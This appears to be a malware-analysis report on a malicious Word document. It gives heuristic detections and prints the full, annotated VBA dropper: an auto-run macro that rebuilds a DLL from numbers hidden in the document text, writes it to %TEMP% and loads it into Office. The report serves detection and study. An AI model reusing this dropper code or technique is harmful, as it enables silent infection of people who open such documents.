MALICIOUS
78
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The `Edit_u2` subroutine references `Environ("ProgramFiles")` and appears to interact with Windows Script Host, suggesting an attempt to download and execute a secondary payload. The presence of a `Document_Open` macro further supports the malicious intent of this document.
Heuristics 5
-
Reference to Windows Script Host — high — SC_STR_WSCRIPT — Reference to Windows Script Host
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS — Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN — Document_Open macro. Matched lines in script:
`End Sub` / `Private Sub Document_Open()` / `Edit_u2 ("Temp")`
-
Environ() call (env variable access) — low — OLE_VBA_ENVIRON — Environ() call (env variable access). Matched lines in script:
`Dim stdDateFilterremoveVariables As Boolean` / `maxResults_contents = Environ(Avawe)` / `If stdDateFilterremoveVariables Then`
-
Embedded URL — info — EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 35efa3d21961c647699da446c79d1e87337b498f6b5ac5aae6af70a79bd9e19c) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15450 bytes |
Preview script — First 1,000 lines of the extracted script
' Standard VBA header of the document class module "ThisDocument", as
' recovered by olevba from the compressed module stream (not hand-written
' by the author). Document_Open further down in this module is therefore
' the document-level open event handler.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Edit_u2: changes the host's current directory to the value of the
' environment variable named by Avawe. Both visible call sites pass "Temp",
' so in practice this is ChDir %TEMP%. It stages the location where
' left_adminemail writes the carved file and where the bare "Lib" name of
' the bidets Declare (module removeheader) is presumably resolved from.
' Note(review): stdDateFilterremoveVariables is declared but never assigned,
' so it is False and the WDTF/WScript blocks below never execute. The same
' block (apparently lifted from a WDTF "SimulatedBatterySystem" sample
' script) is pasted as padding throughout this module.
Sub Edit_u2(Avawe)
Dim maxResults_contents As String
Dim stdDateFilterremoveVariables As Boolean
' Read the environment variable whose name was passed in (e.g. "Temp").
maxResults_contents = Environ(Avawe)
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' The only live effect of this Sub: make that directory the current
' directory, so later relative-name file opens land there.
ChDir (maxResults_contents)
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
End Sub
' left_adminemail: carves a binary file out of the document's own text.
' It walks ThisDocument.Words. Words are ignored until one equals
' `accountid` (start marker); from then on every numeric word is converted
' with Val to a Long and appended as a 4-byte record (Put #39) to the file
' "<collection_sqlquery>.dll", opened in the current directory right after
' Edit_u2("Temp") has changed it to %TEMP%. The word equal to `layout`
' (end marker) stops the scan. A lone "-" word is stitched onto the
' following word, presumably so that negative numbers survive Word's
' tokenisation. Net effect: a DLL is reassembled from numbers hidden in the
' document body; downloadpos_opener then loads it through the `bidets`
' Declare in module removeheader. Parameters taxonomy, OutSum, u31, ans
' and icon are never read.
' Note(review): stdDateFilterremoveVariables is never assigned (False), so
' every `If stdDateFilterremoveVariables Then` block below is unreachable.
Sub left_adminemail(accountid, layout, collection_sqlquery, taxonomy, OutSum, u31, ans, icon)
Dim sorderdbprefix As Long
Dim stdDateFilterremoveVariables As Boolean
Dim endyear_servername As Words
' Source of the payload bytes: the document's Words collection.
Set endyear_servername = ThisDocument.Words
' Not declared anywhere visible (Variant); the minus-sign marker.
codepress_eids = "-"
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' From here on every runtime error (file I/O, Val, ChDir) is silently
' swallowed, so a partial write leaves no trace in the macro itself.
On Error Resume Next
Dim choicetemp As String
Dim tagid_currencyCodeType As Boolean, uniqidrepo As Boolean
Dim left_subscribe As Byte, Last As Long
Dim gallery_u7
' tagid_currencyCodeType = "inside the marker region";
' uniqidrepo = "the previous word was a lone '-'".
tagid_currencyCodeType = False
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' Output filename, e.g. "totalProductCount.dll" for the calls in
' downloadpos_opener.
collection_sqlquery = collection_sqlquery + ".dll"
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' ChDir to %TEMP%, then open the output file For Binary As #39
' (removeheader.mobile).
Edit_u2 ("Temp")
removeheader.mobile (collection_sqlquery)
For Each gallery_u7 In endyear_servername
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' A lone "-" word: remember it and continue with the next word.
If gallery_u7 = codepress_eids Then
uniqidrepo = True
GoTo newpwd
End If
' Previous word was "-": prefix it to this word (re-forms a negative
' number before the IsNumeric/Val step below).
If uniqidrepo = True Then
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
gallery_u7 = codepress_eids + gallery_u7
uniqidrepo = False
End If
' Before the start marker has been seen, skip everything except the
' marker itself.
If gallery_u7 <> accountid And tagid_currencyCodeType = False Then
GoTo newpwd
End If
' Inside the marker region: each numeric word becomes one 4-byte Long
' record appended at the current position of file #39.
If IsNumeric(gallery_u7) And tagid_currencyCodeType Then
sorderdbprefix = Val(gallery_u7)
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
Put #39, , sorderdbprefix
End If
' Start marker: begin writing. End marker: stop writing and leave the loop.
If gallery_u7 = accountid Then
' Unreachable junk block (guard is always False; two nested copies).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
End If
tagid_currencyCodeType = True
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
ElseIf gallery_u7 = layout Then
tagid_currencyCodeType = False
GoTo aname
End If
newpwd:
Next gallery_u7
aname:
' Close #39 (removeheader.Width). `resource` is not declared anywhere in
' the visible source, and Width ignores its argument anyway.
removeheader.Width (resource)
End Sub
' downloadpos_opener: the dropper's driver routine, called from Document_Open.
' 1. Rebuilds "totalProductCount.dll" in %TEMP% from the numbers between the
'    marker words "txtx" and "NEWCHOICENEWCHOICE" in the document text
'    (left_adminemail).
' 2. Calls removeheader.bidets(43), i.e. the export "implode" of that DLL via
'    the Declare in module removeheader — this is where the dropped payload
'    gets executed inside the Office process.
' 3. If that returned False — under On Error Resume Next a failed DLL load
'    also leaves dateEnd_endyear at its default False — rebuilds the same
'    filename from the second region between "USERNAMEUSERNAME" and
'    "answersanswers" and calls bidets(23). Plausibly a second build of the
'    payload (e.g. for another architecture); not verifiable from this
'    source alone.
' Note(review): stdDateFilterremoveVariables is never assigned (False), so
' every `If stdDateFilterremoveVariables Then` block below is unreachable.
Sub downloadpos_opener()
Dim stdDateFilterremoveVariables As Boolean
' Errors from the carve, the DLL load or the export call are swallowed.
On Error Resume Next
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' Result of the first payload call; defaults to False.
Dim dateEnd_endyear As Boolean
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' First build: numbers between "txtx" and "NEWCHOICENEWCHOICE" ->
' %TEMP%\totalProductCount.dll. The trailing five arguments are unused.
Call left_adminemail("txtx", "NEWCHOICENEWCHOICE", "totalProductCount", "returnURL", "banned", "modal", "u6", "exact")
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' Loads the dropped DLL and calls its "implode" export (see Declare in
' module removeheader). Detection hint: Office process loading a DLL
' from %TEMP% immediately after writing it.
dateEnd_endyear = removeheader.bidets(43)
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' Fallback path: second carve into the same filename, second call.
If dateEnd_endyear = False Then
Call left_adminemail("USERNAMEUSERNAME", "answersanswers", "totalProductCount", "returnURL", "banned", "modal", "u6", "exact")
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' Unreachable junk block (guard is always False).
If stdDateFilterremoveVariables Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' Second attempt at running the carved DLL's export; return value discarded.
removeheader.bidets (23)
End If
End Sub
' Document_Open: auto-executes when the document is opened with macros
' enabled. ChDir %TEMP% (Edit_u2), then run the carve-and-load routine.
' No user interaction beyond enabling macros is required.
Private Sub Document_Open()
Edit_u2 ("Temp")
downloadpos_opener
End Sub
' Module "removeheader": file-handle helpers plus the Declare that executes
' the dropped DLL. PtrSafe marks these Declares as usable on 64-bit Office.
Attribute VB_Name = "removeheader"
' ntdll!RtlMoveMemory, declared but never called in the visible source.
Private Declare PtrSafe Sub languages Lib "ntdll" Alias "RtlMoveMemory" _
(Destination As LongPtr, Source As LongPtr, ByVal Length As LongPtr)
' The payload entry point. Lib "totalProductCount" (no path, no extension)
' is resolved by the loader as totalProductCount.dll — the file that
' left_adminemail writes into %TEMP%, which Edit_u2 has made the current
' directory — and Alias "implode" is the export invoked. Any call to
' bidets() therefore loads the carved DLL into the Office process.
Declare PtrSafe Function bidets Lib "totalProductCount" Alias "implode" (ByVal ArgVal1 As Long) As Boolean
' Declared but never called in the visible source; whether ntdll exports
' an "index" symbol is not established here — TODO confirm.
Private Declare PtrSafe Sub dob Lib "ntdll" Alias "index" _
(Destination As LongPtr, Source As LongPtr, ByVal Length As LongPtr)
' Width: closes file handle #39 (the carved DLL opened by mobile). The
' `edit` parameter is never read. map_orderby is declared but never
' assigned (False) and ctid_menu is not declared in this Sub at all
' (Empty, i.e. False here), so both WDTF/WScript blocks are unreachable.
Sub Width(edit)
Dim map_orderby As Boolean
' Unreachable junk block (guard is always False).
If map_orderby Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' The only live statement: flush and close the output file.
Close #39
' Unreachable junk block (ctid_menu is not declared here; evaluates False).
If ctid_menu Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
End Sub
' mobile: opens the file named by `edit` (e.g. "totalProductCount.dll",
' relative to the current directory, i.e. %TEMP% after Edit_u2) in Binary
' mode as file #39, creating it if it does not exist. left_adminemail then
' appends Long records to it with Put #39. ctid_menu is declared but never
' assigned (False), so both WDTF/WScript blocks are unreachable.
Sub mobile(edit)
Dim ctid_menu As Boolean
' Unreachable junk block (guard is always False).
If ctid_menu Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
' The only live statement: open the drop file for binary writes.
' Note(review): Binary mode does not truncate an existing file, so a
' second, shorter carve into the same name may leave trailing bytes
' from the first — TODO confirm against the sample's behaviour.
Open edit For Binary As #39
' Unreachable junk block (guard is always False).
If ctid_menu Then
'
' Get SimulatedBatterySystem action interface
'
Set SimulatedBatterySystemSystemAction = WDTF.SystemDepot.ThisSystem.GetInterface("SimulatedBatterySystem")
If WScript.Arguments.Named.Exists("setup") Then
CX.Setup
ElseIf WScript.Arguments.Named.Exists("cleanup") Then
CX.Cleanup
ElseIf WScript.Arguments.Named.Exists("AC") Then
CX.AC
ElseIf WScript.Arguments.Named.Exists("DC") Then
CX.DC
ElseIf WScript.Arguments.Named.Exists("percent") Then
CX.ChargeLevel WScript.Arguments.Named("percent")
Else
CX.Help
End If
End If
End Sub
|
|||